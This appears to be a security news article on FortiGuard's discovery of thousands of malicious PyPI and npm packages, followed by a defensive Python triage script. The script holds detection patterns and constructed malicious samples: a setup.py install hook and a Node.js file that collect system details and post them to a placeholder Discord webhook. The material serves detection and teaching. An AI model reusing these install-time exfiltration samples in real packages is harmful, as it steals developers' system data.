5000+ Malicious Packages Found In The Wild To Compromise Windows Systems

FortiGuard Labs has recently uncovered more than 5,000 malicious software packages designed to compromise Windows systems. These packages, detected from November 2024 onward, use techniques that evade traditional security measures while executing actions that can lead to data theft, unauthorized access, and complete system compromise. The analysis reveals an ongoing trend in which attackers continuously refine their methods to bypass security controls and infiltrate systems undetected.

Of the packages analyzed, 1,052 contained suspicious install scripts designed to deploy malicious code silently during installation, often hooking the standard install procedure so that the harmful actions run without user awareness. Further analysis by Fortinet researchers found 681 packages using suspicious APIs, including https.get and https.request, primarily to exfiltrate sensitive data or establish remote control. The investigation also identified 1,082 packages with unusually low file counts, a tactic that minimizes the detection footprint while maximizing damage potential; 1,043 packages lacking repository URLs, which undermines their legitimacy and traceability; 974 packages containing suspicious URLs that potentially facilitate communication with command-and-control servers; 537 packages with empty descriptions, which further obscures malicious intent; and 164 packages with unusually high version numbers, used to make the package appear more established or current than it is.

One particularly concerning attack vector involves Python packages that abuse the setup.py file, which runs at install time, to silently collect system information. Packages such as AffineQuant-99.6, amzn-aws-glue-ml-libs-python-6.1.5, and amzn-awsglue-6.1.4 were found to gather MAC addresses, hostnames, usernames, and directory information before transmitting this data to attacker-controlled servers. The script chooses its system command by operating system (getmac on Windows, ifconfig on Linux/macOS) and base64-encodes the stolen information before exfiltration. In another example described by the researchers, the code not only logs keystrokes but also establishes a backdoor with elevated privileges, giving attackers complete control of the system while collecting operating system details, installed applications, and network configurations.

Similarly, malicious Node.js packages such as seller-admin-common_6.5.8 and seller-rn-mng-lib_6.5.8 contain code that harvests sensitive information, including internal and external IP addresses, DNS servers, and user details, bundles it into JSON objects, and transmits it to attackers via Discord webhooks.

Taken together, these packages pose a substantial threat to Windows systems, with capabilities ranging from keylogging and data exfiltration to establishing backdoors and executing remote commands. FortiGuard Labs recommends that developers install packages only from trusted sources, review package contents before installation, use isolated virtual environments, employ security scanning tools, and keep dependencies up to date.
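As an added example (not FortiGuard's detection tooling or any code from the report), the following Python script applies the heuristics above statically to a package before it is installed: it parses a setup.py for setuptools install-command overrides, recon commands such as getmac and ifconfig, base64 encoding and outbound network calls, and checks an npm package's manifest and entry file for lifecycle install scripts, an empty description, a missing repository URL, an inflated version number, the https.request pattern and webhook URLs. The indicator lists, the major-version threshold, and the sample setup.py, package.json and index.js are constructed assumptions for illustration; the samples are only parsed, never executed.

```python
import ast
import json
import re

# Indicator lists are assumptions chosen to match the behaviours the report describes.
SUSPICIOUS_URL = re.compile(
    r"https?://(?:discord(?:app)?\.com/api/webhooks|\d{1,3}(?:\.\d{1,3}){3})[^\s\"']*")
NPM_LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
NPM_SUSPICIOUS_APIS = ("https.get", "https.request", "child_process",
                       "os.networkInterfaces", "dns.getServers", "os.userInfo")
PY_SUSPICIOUS_CALLS = {"subprocess.check_output", "subprocess.run", "subprocess.Popen",
                       "os.popen", "os.system", "base64.b64encode",
                       "urllib.request.urlopen", "requests.post", "requests.get"}
RECON_COMMANDS = ("getmac", "ifconfig", "ipconfig", "whoami")
MAX_SANE_MAJOR = 50  # assumption: a major version above this is treated as inflated


def _dotted_name(node):
    """Return 'pkg.attr.attr' for a Name/Attribute chain, '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def triage_setup_py(source):
    """Flag install-time hooks, recon commands, encoding and exfil calls in a setup.py."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.ClassDef):
            # Subclassing setuptools' install/develop command makes run() execute at pip install.
            bases = {_dotted_name(b) for b in node.bases}
            if any(b.split(".")[-1] in ("install", "develop") for b in bases):
                findings.add(f"install hook: class {node.name} overrides a setuptools command")
        elif isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in PY_SUSPICIOUS_CALLS:
                findings.add(f"suspicious call: {name}")
            if name == "setup" and any(k.arg == "cmdclass" for k in node.keywords):
                findings.add("install hook: setup(cmdclass=...)")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            tokens = node.value.split()
            if tokens and tokens[0] in RECON_COMMANDS:
                findings.add(f"recon command: {tokens[0]}")
            for url in SUSPICIOUS_URL.findall(node.value):
                findings.add(f"suspicious URL: {url}")
    return sorted(findings)


def triage_npm(manifest_json, entry_source):
    """Apply the manifest and source heuristics to an npm package."""
    findings = set()
    manifest = json.loads(manifest_json)
    scripts = manifest.get("scripts", {})
    for hook in NPM_LIFECYCLE_HOOKS:
        if hook in scripts:
            findings.add(f"install script: {hook} -> {scripts[hook]}")
    if not manifest.get("description", "").strip():
        findings.add("empty description")
    if "repository" not in manifest:
        findings.add("no repository URL")
    major = re.match(r"\d+", manifest.get("version", "0"))
    if major and int(major.group()) > MAX_SANE_MAJOR:
        findings.add(f"inflated version: {manifest['version']}")
    for api in NPM_SUSPICIOUS_APIS:
        if api in entry_source:
            findings.add(f"suspicious API: {api}")
    for url in SUSPICIOUS_URL.findall(entry_source + json.dumps(scripts)):
        findings.add(f"suspicious URL: {url}")
    return sorted(findings)


# Constructed samples mirroring the behaviour described above; they are parsed, never run.
SAMPLE_SETUP_PY = '''
import base64, platform, subprocess, urllib.request
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        cmd = "getmac" if platform.system() == "Windows" else "ifconfig"
        blob = base64.b64encode(subprocess.check_output(cmd, shell=True))
        urllib.request.urlopen("https://discord.com/api/webhooks/0/constructed-example", data=blob)
        install.run(self)

setup(name="constructed-example-pkg", version="99.6", cmdclass={"install": PostInstall})
'''

SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "constructed-example-lib", "version": "99.6.0", "description": "",
    "scripts": {"postinstall": "node index.js"},
})

SAMPLE_INDEX_JS = '''
const os = require("os"), dns = require("dns"), https = require("https");
const data = JSON.stringify({ifaces: os.networkInterfaces(), dns: dns.getServers(), user: os.userInfo()});
const req = https.request("https://discord.com/api/webhooks/0/constructed-example", {method: "POST"});
req.end(data);
'''

if __name__ == "__main__":
    for label, hits in (("setup.py", triage_setup_py(SAMPLE_SETUP_PY)),
                        ("npm", triage_npm(SAMPLE_PACKAGE_JSON, SAMPLE_INDEX_JS))):
        print(label, *hits, sep="\n  ")
```

Run it against a downloaded sdist or tarball (pip download / npm pack) before installing; a clean setup.py that only calls setup() produces no findings, while any install-command override or lifecycle script should be read by hand before the package is allowed anywhere near a developer machine or CI runner.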

This Cyber News was published on cybersecuritynews.com. Publication date: Tue, 11 Mar 2025 11:50:07 +0000
